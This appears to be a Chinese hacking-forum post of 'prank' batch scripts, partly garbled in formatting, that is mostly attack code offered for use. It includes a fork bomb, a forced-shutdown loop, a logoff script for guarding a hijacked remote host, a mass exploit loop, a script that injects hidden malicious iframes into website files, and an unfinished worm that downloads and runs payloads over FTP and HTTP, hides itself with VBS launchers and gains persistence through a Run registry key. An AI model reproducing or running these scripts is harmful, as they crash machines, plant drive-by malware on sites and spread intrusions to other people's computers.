一些bat恶搞代码

1、第一个：让别人内存OVER©他重启）echo offstart cmd%0就这 3 行了第二个 : 让对方重启指定次数（ 害人专用 ）echo offif not exist c:1.txt echo. >c:1.txt & goto err1if not exist c:2.txt echo. >c:2.txt & goto err1if not exist c:3.txt echo. >c:3.txt & goto err1if not exist c:4.txt echo. >c:4.txt & goto err1if n

2、ot exist c:5.txt echo. >c:5.txt & goto err1goto err2:err1shutdown -s -t 0:err2上面可以让对方电脑重启 5 次后不在重启第三个 : 自动踢人 （3389 肉机保护自己专用 ）echo offlogoff 1del log.batlogoff 后面的 1 改成自己登陆的 ID 号, 用 query user 查看第四个 : 批量自动溢出for /f %i in （result.txt） do 42 %i 58 521先自己用NC监听端口，多开几个，然后指行，就自动溢出了第五个 : 自动挂

3、马改主页 echo offclsrem 直接打批处理名字就有帮助title 批量挂马 , 改首页 （伤脑筋 QQ:447228437）.color Aset pan=%1set ye=%2set dai=%3if "%pan%"="" goto e1if "%ye%"="" goto e1if "%dai%"="" goto e1if "%dai%"="htm.txt" goto u1forfiles /p %pan% /m %ye%

4、/s /c "cmd /c if isdir=FALSE echo A<iframe src="http:/%dai%" width="0" height="0" frameborder="0"A> >>path" echo.echo 代码全部插入完毕 !echo.pausegoto e1:u1echo您现在的操作将使pan魏下，全部名为ye%J内容变为您要更改的内容.echo 这将是非常危险的 , 您真的要这样做? 回车却认 ,Ctrl+c 取消操作 .pausefor

5、files /p %pan% /m %ye% /s /c "cmd /c if isdir=FALSE copy %1htm.txt path /y" echo.echo首页全部更改完必！!！如果您发现没有替换成功，请将ye%C件只读属性去掉 .echo.pause:e1echo.echo 本批处理只适用于2003 系统 , 其他系统要使用 , 请将 forfiles.exe 拷贝至系统盘 system32 目录下echo 用法 :snj A< 搜索盘符 A> A< 文件名 A> A< 网马地址 A>echo 例子 :snj d: ind

6、ex.asp echo 批处理将自动添加A<iframeA> 标记echo.echo 如果您要更改全部网站的首页! 请在批处理文件所在目录下 , 新建一个名为htm.txt 的文本文件.echo然后将要更改的代码加COPY&J里面保存.然后将命令的a<网马地址a>项输 入为 htm.txt 即可 .echo 例子 :snj d: index.asp htm.txtecho.echo 为了能准确无误执行批处理请最好先把记事本的 " 自动换行功能去掉", 让命令保持在一行才能正确执行.echo.echo 使用此批处理造成一切后果本人概不负责, 请

7、大家谨慎使用echo.第六个 : 利用批处理编写利用系统漏洞传播的蠕虫病毒本来想写完后在做教程, 要去学校了 , 所以先把思路告诉大家, 大家可以先自己写写,我有时间写完发到群里.这些是我未完成的批处理, 大家可以在此基础上按照我下面说的思路继续写完del c:42.exedel c:nc.exedel c:ip.exeecho dim wsh > %systemroot%helptest.vbsecho setwsh=CreateObject("WScript.Shell") >> %systemroot%helptest.vbs echo wsh.ru

8、n "cmd /c %systemroot%helpnc -v -l -p 810< %systemroot%helpor.txt",0 >> %systemroot%helptest.vbsecho dim wsh > %systemroot%helptest2.vbsecho setwsh=CreateObject("WScript.Shell") >> %systemroot%helptest2.vbs echo wsh.run "cmd /cstart %systemroot%helpgood.bat

9、",0 >> %systemroot%helptest2.vbsecho open > %systemroot%helpftp.txtecho open myyes >> %systemroot%helpftp.txtecho 1 >> %systemroot%helpftp.txtecho binary >> %systemroot%helpftp.txtecho get 42.exe c:42.exe >> %systemroot%helpftp.txtecho get nc.exe c:nc.e

10、xe >> %systemroot%helpftp.txtecho get ip.exe c:ip.exe >> %systemroot%helpftp.txtecho bye >> %systemroot%helpftp.txtecho echo Set xPost = CreateObject("Microsoft.XMLHTTP")A>1.vbs > %systemroot%helpor.txtecho echo xPost.Open "GET","/my.exe

11、&quo.,0A>A>1.vbs >> %systemroot%helpor.txtecho echo xPost.Send() A>A>1.vbs >> %systemroot%helpor.txtecho echo Set sGet = CreateObject("ADODB.Stream")A>A>1.vbs >> %systemroot%helpor.txtecho echo sGet.Mode = 3 A>A>1.vbs >> %systemroot%helpo

12、r.txtecho echo sGet.Type = 1 A>A>1.vbs >> %systemroot%helpor.txtecho echo sGet.Write(xPost.responseBody)A>A>1.vbs >> %systemroot%helpor.txtecho echo sGet.SaveToFile "d:my.exe",2A>A>1.vbs >> %systemroot%helpor.txtecho echo 1.vbs A>A>1.vbs >> %

13、systemroot%helpor.txtecho echo my.exe A>A>1.vbs >> %systemroot%helpor.txtecho Windows Registry Editor Version 5.00 > %systemroot%help1.regechoHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun >> %systemroot%help1.reg系统安全工具FireWallPFW.exe" >> %systemroot%help

14、1.regecho "1"="%systemroot%helptest2.vbs" >> %systemroot%help1.regif not exist %systemroot%helpgood.bat copygood.bat %systemroot%helpgood.bat & %systemroot%helptest2.vbs & del good.batregedit -s %systemroot%help1.regftp -s:%systemroot%helpftp.txtmove c:nc.exe %syste

15、mroot%help /ymove c:42.exe %systemroot%help /ymove c:ip.exe %systemroot%help /y%systemroot%helptest.vbsrem for /f %i in (result1.txt) do set a=%irem for /f %j in (result.txt) do 42 %a% %j 810准备 :1:找一个反向连接的溢出攻击程序,如ms06040漏洞2:找呀一个免费FTP空间，最好是送域名的3: 利用你所知道的高级语言编写一个, 能生成随机范围 IP 地址和找到本机IP 的工具 .思路 :用 for 语

16、句对指定文本里的 IP 进行溢出 , 然后用 if 语句判断是否溢出成功 , 如果成功开启一个NC监听端口，NC后面带一个 < 输入符号输入的内容为下载本批处理文件, 然后执行这个批处理. 这样被溢出的机器就又会在他那里运行我门的批处理, 从而到自动传播的目的 .把批处理生成的文件集中放到一个目录下,可以systemroot%系统变量直接放到系统目录下因为批处理运行后会闪出命令行窗口 ，我门可以利用VBS 脚本来运行我们的批处理 , 这样就不会有任何窗口出现, 脚本如下echo dim wsh > %systemroot%helptest.vbsecho setwsh=Create

17、Object("WScript.Shell") >> %systemroot%helptest.vbsecho wsh.run "cmd /c %systemroot%helpnc -v -l -p 810< %systemroot%helpor.txt",0 >> %systemroot%helptest.vbs生成随机IP工具的VB代码Private Sub Form_Load()Dim fso As New FileSystemObjectDim a, b, c, d As IntegerDim ph, e As Stringph = App.Path & "" & "ip.txt" Random